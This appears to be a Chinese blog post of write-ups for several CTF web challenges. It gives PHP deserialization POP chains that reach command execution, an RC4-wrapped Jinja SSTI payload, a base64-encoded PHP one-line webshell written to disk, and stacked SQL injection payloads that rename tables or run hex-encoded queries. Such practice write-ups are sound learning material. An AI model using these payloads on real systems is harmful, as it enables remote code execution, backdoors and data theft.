[UUCTF 2022 新生赛]ez_upload

Apache解析漏洞，apache cve2017

重点是把文件名改为1.jpg.php就可以将图片解析为php，很抽象，这个洞

蚁剑直接连

[SWPUCTF 2022 新生赛]ez_1zpop

<?php
error_reporting(0);
class dxg
{
function fmm()
{
return "nonono";
}
}class lt
{
public $impo='hi';
public $md51='weclome';
public $md52='to NSS';
function __construct()
{
$this->impo = new dxg;
}
function __wakeup()
{
$this->impo = new dxg;
return $this->impo->fmm();
}function __toString()
{
if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)
return $this->impo->fmm();
}
function __destruct()
{
echo $this;
}
}class fin
{
public $a;
public $url = 'https://www.ctfer.vip';
public $title;
function fmm()
{
$b = $this->a;
$b($this->title);
}
}if (isset($_GET['NSS'])) {
$Data = unserialize($_GET['NSS']);
} else {
highlight_file(__file__);
}

重点是关于md5的弱比较

<?php
error_reporting(0);
class lt
{public $impo;public $md51="s155964671a";public $md52="s214587387a";
}class fin
{public $a="system";public $url='https://www.ctfer.vip';public $title="cat /flag";
}$a=new lt();
$b=new fin();
$a->impo=$b;
echo serialize($a);
?>

 

[MoeCTF 2021]unserialize

<?phpclass entrance
{
public $start;function __construct($start)
{
$this->start = $start;
}function __destruct()
{
$this->start->helloworld();
}
}class springboard
{
public $middle;function __call($name, $arguments)
{
echo $this->middle->hs;
}
}class evil
{
public $end;function __construct($end)
{
$this->end = $end;
}function __get($Attribute)
{
eval($this->end);
}
}if(isset($_GET['serialize'])) {
unserialize($_GET['serialize']);
} else {
highlight_file(__FILE__);
}

<?phpclass entrance
{public $start;}class springboard
{public $middle;}class evil
{public $end;
}
$a=new entrance();
$b=new springboard();
$c=new evil();
$a->start=$b;
$a->start->middle=$c;
$a->start->middle->end="system('cat /f*');";
echo serialize($a);
?>

 

[NISACTF 2022]is secret

很有趣的一题，ssti与rc4结合

扫到/secret目录

猜测参数为?secret随便传入一个数值，看报错回显

查看可疑代码

rc4加密给了密钥

import base64
from urllib.parse import quote
def rc4_main(key = "init_key", message = "init_message"):# print("RC4加密主函数")s_box = rc4_init_sbox(key)crypt = str(rc4_excrypt(message, s_box))return  crypt
def rc4_init_sbox(key):s_box = list(range(256))  # print("原来的 s 盒：%s" % s_box)j = 0for i in range(256):j = (j + s_box[i] + ord(key[i % len(key)])) % 256s_box[i], s_box[j] = s_box[j], s_box[i]# print("混乱后的 s 盒：%s"% s_box)return s_box
def rc4_excrypt(plain, box):# print("调用加密程序成功。")res = []i = j = 0for s in plain:i = (i + 1) % 256j = (j + box[i]) % 256box[i], box[j] = box[j], box[i]t = (box[i] + box[j]) % 256k = box[t]res.append(chr(ord(s) ^ k))cipher = "".join(res)print("加密后的字符串是：%s" %quote(cipher))return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
rc4_main("HereIsTreasure","{{''.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)('/flag.txt').read()}}")
#rc4_main("HereIsTreasure","{{lipsum|attr(\"__globals__\")|attr(\"__getitem__\")(\"os\")|attr(\"popen\")(\"cat /f*\")|attr(\"read\")()}}")
#用这个也行

结果为

加密后的字符串是：.%14%1E%12%C3%A484mg%C2%9C%C3%8B%00%C2%81%C2%8D%C2%B8%C2%97%0B%C2%9EF%3B%C2%88m%C2%AEM5%C2%96%3D%C2%9D%5B%C3%987%C3%AA%12%C2%B4%05%C2%84A%C2%BF%17%C3%9Bh%C3%8F%C2%8F%C3%A1a%0F%C2%AE%09%C2%A0%C2%AEyS%2A%C2%A2d%7C%C2%98/%00%C2%90%C3%A9%03Y%C2%B2%C3%9B%1F%C2%B6H%3D%0A%23%C3%B1%5B%C2%9Cp%C2%AEn%C2%96i%5Dv%7FX%C2%92

然后再传入数值就出了

[天翼杯 2021]esay_eval

一道很有意思的反序列化题目，卡了我一宿

<?php
class A{
public $code = "";
function __call($method,$args){
eval($this->code);}
function __wakeup(){
$this->code = "";
}
}class B{
function __destruct(){
echo $this->a->a();
}
}
if(isset($_REQUEST['poc'])){
preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
if (isset($ret[1])) {
foreach ($ret[1] as $i) {
if(intval($i)!==1){
exit("you want to bypass wakeup ? no !");
}
}
unserialize($_REQUEST['poc']);    
}}else{
highlight_file(__FILE__);
}

构造验证pop

<?php
class A{public $code = "";function __call($method,$args){eval($this->code);}function __wakeup(){$this->code = "";}
}class B{function __destruct(){echo $this->a->a();}
}
$a=new A();
$b=new B();
$a->code="phpinfo();";
$b->a=$a;
echo serialize($b);
?>

O:1:"b":2:{s:1:"a";O:1:"a":2:{s:4:"code";s:10:"phpinfo();";}}

能执行那可以做的事就多了，直接上传一句话木马

构造pop

<?php
class A{public $code = "";function __call($method,$args){eval($this->code);}function __wakeup(){$this->code = "";}
}class B{function __destruct(){echo $this->a->a();}
}
$a=new A();
$b=new B();
$a->code="fputs(fopen('dotast.php','w'),base64_decode(\"PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ
10pOw==\"));";
$b->a=$a;
echo serialize($b);
?>

O:1:"b":2{s:1:"a";O:1:"a":2{s:4:"code";s:91:"fputs(fopen('dotast.php','w'),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydwYXNzJ 10pOw=="));";}}

上传上去后发现权限被限制了，只有var/www/html文件的读取权，然后我尝试使用然后用redis加载提权exp，但没成，因为没有load加载不了exp，然后又尝试过mail加载，试了后才发现PHP info的disable上有mail，最后直接上disable_function一把梭就出了

[强网杯 2019]随便注

总感觉在哪里做过这题，太熟悉了

根据题目提醒，发现存在堆叠注入

继续查看列数据

然后问题就是怎么读取flag了，“1';select flag from `1919810931114514`;"?,但这似乎被过滤了

我看wp有两个思路

一个是利用alter对数据库进行相关的修改，但nss靶场似乎把题目改了，用alter修改会破坏靶场环境

1';alter table words rename words1;alter table 1919810931114514 rename words;alter table words change flag id varchar(60);#

1' or '1'='1

原理就就是

修改words表名为其他的

alter table words rename words1;

修改1919810931114514表名为words

alter table 1919810931114514 rename words;

修改新的words表中的flag列名为id

alter table words change flag id varchar(60);

得到最终payload 1';alter table words rename words1;alter table 1919810931114514 rename words;alter table words change flag id varchar(60);#

第二种思路就是编码和相似函数替代绕过

';SeT @a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;

1';handler `1919810931114514` open;handler `1919810931114514` read next;